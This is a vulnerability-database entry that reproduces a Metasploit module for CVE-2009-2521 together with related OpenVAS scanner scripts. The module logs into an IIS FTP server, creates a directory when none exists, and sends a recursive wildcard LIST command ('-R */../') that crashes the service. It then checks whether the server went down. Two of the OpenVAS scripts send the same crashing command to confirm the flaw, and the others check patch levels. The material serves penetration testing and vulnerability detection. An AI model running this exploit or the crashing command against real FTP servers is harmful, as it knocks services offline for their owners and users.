ID MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the "FTP Publishing" must be configured as "manual" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet
Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command
containing a wildcard. For this exploit to work in most cases, you need 1) a valid
ftp account: either read-only or write-access account 2) the "FTP Publishing" must
be configured as "manual" mode in startup type 3) there must be at least one
directory under FTP root directory. If your provided an FTP account has write-access
privilege and there is no single directory, a new directory with random name will be
created prior to sending exploit payload.
},
'Author' =>
[
'Kingcope', # Initial discovery
'Myo Soe' # Metasploit Module (http://yehg.net)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'MSB', 'MS09-053'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
],
'DisclosureDate' => 'Sep 03 2009'))
end
def run
# Attempt to crash IIS FTP
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')
res = send_cmd_data(['ls'],'')
if res.to_s =~ /\<DIR\> / then
print_status('Directory found, skipped creating a directory')
else
print_status('No single directory found')
print_status('Attempting to create a directory ...')
new_dir = Rex::Text.rand_text_alphanumeric(6)
res = send_cmd(['mkd',new_dir])
if res =~ /directory created/ then
print_status("New directory \"#{new_dir}\" was created!")
else
print_error('Write-access was denied')
print_error('Exploit failed')
disconnect
return
end
end
print_status("Sending DoS packets ...")
res = send_cmd_datax(['ls','-R */../'],' ')
disconnect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionRefused
print_error("Cannot connect. The server is not running.")
return
rescue Rex::ConnectionTimeout
print_error("Cannot connect. The connection timed out.")
return
rescue
end
#More careful way to check DOS
print_status("Checking server's status...")
begin
connect_login
disconnect
print_error("DOS attempt failed. The service is still running.")
rescue
print_good("Success! Service is down")
end
end
# Workaround: modified send_cmd_data function with short sleep time before data_disconnect call
# Bug Tracker: 4868
def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)
args[0] = "LIST"
# Set the transfer mode and connect to the remove server
return nil if not data_connect(mode)
# Our pending command should have got a connection now.
res = send_cmd(args, true, nsock)
# make sure could open port
return nil unless res =~ /^(150|125) /
# dispatch to the proper method
begin
data = self.datasocket.get_once(-1, ftp_timeout)
rescue ::EOFError
data = nil
end
select(nil,nil,nil,1)
# close data channel so command channel updates
data_disconnect
# get status of transfer
ret = nil
ret = recv_ftp_resp(nsock)
ret = [ ret, data ]
ret
end
end
{"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2020-10-06T03:16:26", "viewCount": 215, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2020-10-06T03:16:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "seebug", "idList": ["SSV:12477", "SSV:12236"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:1361412562310900944", "OPENVAS:900874"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "mskb", "idList": ["KB975254"]}], "modified": "2020-10-06T03:16:26", "rev": 2}, "vulnersScore": 6.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2020-12-09T19:31:20", "description": "Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka \"IIS FTP Service DoS Vulnerability.\"", "edition": 7, "cvss3": {}, "published": "2009-09-04T10:30:00", "title": "CVE-2009-2521", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2521"], "modified": "2020-11-23T19:50:00", "cpe": ["cpe:/a:microsoft:internet_information_services:7.0"], "id": "CVE-2009-2521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-06-10T20:03:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2521"], "description": "The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.", "modified": "2020-06-09T00:00:00", "published": "2009-09-18T00:00:00", "id": "OPENVAS:1361412562310900944", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900944", "type": "openvas", "title": "Microsoft IIS FTP Server 'ls' Command DOS Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ftp_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900944\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2521\");\n script_bugtraq_id(36273);\n script_name(\"Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/advisory/975191.mspx\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx\");\n script_xref(name:\"URL\", value:\"http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_ms_iis_ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"MS/IIS-FTP/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote authenticated users to crash the\n application leading to denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services version 5.0 and 6.0.\");\n\n script_tag(name:\"insight\", value:\"A stack consumption error occurs in the FTP server while processing crafted\n LIST command containing a wildcard that references a subdirectory followed by\n a .. (dot dot).\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IIS version 7.5\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!ftpPort = get_app_port(cpe:CPE, service:\"ftp\"))\n exit(0);\n\nif(!get_app_location(port:ftpPort, cpe:CPE))\n exit(0);\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc)\n exit(0);\n\nkb_creds = ftp_get_kb_creds();\nlogin = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nif(ftp_authenticate(socket:soc, user:login, pass:pass)) {\n\n cmd = 'LIST \"-R */../\"\\r\\n'; # The IIS server crashes and restarted.\n send(socket:soc, data:cmd);\n sleep(10);\n buff = recv(socket:soc, length:1024);\n\n ecmd = 'LIST\\r\\n';\n send(socket:soc, data:ecmd);\n eresp = recv(socket:soc, length:1024);\n if(\"Can't open data connection\" >< eresp){\n security_message(port:ftpPort);\n }\n}\n\nclose(soc);\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:14:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2521"], "description": "The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.", "modified": "2017-01-27T00:00:00", "published": "2009-09-18T00:00:00", "id": "OPENVAS:900944", "href": "http://plugins.openvas.org/nasl.php?oid=900944", "type": "openvas", "title": "Microsoft IIS FTP Server 'ls' Command DOS Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_iis_ftpd_ls_dos_vuln.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allows remote authenticated users to crash the\n application leading to denial of service condition.\n Impact Level: Application\";\ntag_affected = \"Microsoft Internet Information Services version 5.0 and 6.0\";\ntag_insight = \"A stack consumption error occurs in the FTP server while processing crafted\n LIST command containing a wildcard that references a subdirectory followed by\n a .. (dot dot).\";\ntag_solution = \"Upgrade to IIS version 7.5\n http://www.iis.net/\";\ntag_summary = \"The host is running Microsoft IIS with FTP server and\n is prone to Denial of Service vulnerability.\";\n\nif(description)\n{\n script_id(900944);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-18 08:01:03 +0200 (Fri, 18 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2521\");\n script_bugtraq_id(36273);\n script_name(\"Microsoft IIS FTP Server 'ls' Command DOS Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/975191.mspx\");\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/msrc/archive/2009/09/01/microsoft-security-advisory-975191-released.aspx\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/msrc/archive/2009/09/03/microsoft-security-advisory-975191-revised.aspx\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_ftp_anonymous.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\ninclude(\"version_func.inc\");\n\nftpPort = get_kb_item(\"Services/ftp\");\nif(!ftpPort){\n ftpPort = 21;\n}\n\nif(!get_port_state(ftpPort)) {\n exit(0);\n}\n\nbanner = get_ftp_banner(port:ftpPort);\nif(\"Microsoft FTP Service\" >!< banner) {\n exit(0);\n}\n\nif(!safe_checks())\n{\n soc = open_sock_tcp(ftpPort);\n if(!soc) {\n exit(0);\n }\n\n login = get_kb_item(\"ftp/login\");\n if(!login){\n login = \"anonymous\";\n }\n pass = get_kb_item(\"ftp/password\");\n if(!pass){\n pass = \"anonymous\";\n }\n\n if(ftp_authenticate(socket:soc, user: login, pass: pass))\n {\n cmd = 'LIST \"-R */../\"\\r\\n';\t# The IIS server crashes and restarted.\n send(socket:soc, data:cmd);\n sleep(10);\n buff = recv(socket:soc, length:1024);\n\n ecmd = 'LIST\\r\\n';\n send(socket:soc, data:ecmd);\n eresp = recv(socket:soc, length:1024);\n if(\"Can't open data connection\" >< eresp){\n security_message(ftpPort);\n }\n }\n close(soc);\n}\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-06-10T20:03:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2521", "CVE-2009-3023"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.", "modified": "2020-06-09T00:00:00", "published": "2009-10-15T00:00:00", "id": "OPENVAS:1361412562310900874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900874", "type": "openvas", "title": "Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-25\n# - To detect file version 'ftpsvc2.dll' on vista and win 2008\n#\n# Updated Updated By: Antu Sanadi <santu@secpod.com> on 2012-06-05\n# - Updated to support GDR and LDR versions.\n# - Removed get_file_version function.\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900874\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-10-15 15:35:39 +0200 (Thu, 15 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_name(\"Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/975254\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/2542\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/2481\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary code with\n SYSTEM privileges which may result Denial of Service on the affected server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services (IIS) 5.0/5/1/6.0.\");\n\n script_tag(name:\"insight\", value:\"- This issue is caused by an error when processing directory listing commands\n including the '*' character and '../' sequences, which could be exploited to exhaust the stack.\n\n - An heap-based buffer overflow error occurs in the FTP service when processing\n a specially crafted 'NLST' command.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n# MS09-053 Hotfix check\nif((hotfix_missing(name:\"975254\") == 0)){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\inetsrv\\ftpsvc2.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"5.0.2195.7336\"))\n {\n security_message(21);\n exit(0);\n }\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.3624\")){\n security_message(21);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2600.5875\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4584\")){\n security_message(21);\n }\n exit(0);\n }\n security_message(21);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6000.16000\", test_version2:\"7.0.6000.16922\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21122\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6001.18000\", test_version2:\"7.0.6001.18326\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6001.22000\", test_version2:\"7.0.6001.22515\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18106\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22218\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:56:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2521", "CVE-2009-3023"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.", "modified": "2017-07-07T00:00:00", "published": "2009-10-15T00:00:00", "id": "OPENVAS:900874", "href": "http://plugins.openvas.org/nasl.php?oid=900874", "type": "openvas", "title": "Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms09-053.nasl 6605 2017-07-07 11:22:07Z cfischer $\n#\n# Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-25\n# - To detect file version 'ftpsvc2.dll' on vista and win 2008\n#\n# Updated Updated By: Antu Sanadi <santu@secpod.com> on 2012-06-05\n# - Updated to support GDR and LDR versions.\n# - Removed get_file_version function.\n# \n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary code with\n SYSTEM privileges which may result Denial of Service on the affected server.\n Impact Level: System/Application.\";\ntag_affected = \"Microsoft Internet Information Server (IIS) 5.0/5/1/6.0\";\ntag_insight = \"- This issue is caused by an error when processing directory listing commands\n including the '*' character and '../' sequences, which could be exploited\n to exhaust the stack.\n - An heap-based buffer overflow error occurs in the FTP service when processing\n a specially crafted 'NLST' command.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link.\n http://technet.microsoft.com/en-us/security/bulletin/MS09-053\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS09-053.\";\n\nif(description)\n{\n script_id(900874);\n script_version(\"$Revision: 6605 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 13:22:07 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-15 15:35:39 +0200 (Thu, 15 Oct 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2521\", \"CVE-2009-3023\");\n script_bugtraq_id(36273, 36189);\n script_name(\"Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/975254\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/2542\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/2481\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/MS09-053\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"secpod_ms_iis_ftpd_detect.nasl\");\n script_mandatory_keys(\"MS/IIS-FTP/Installed\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"MS/IIS-FTP/Installed\")){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, 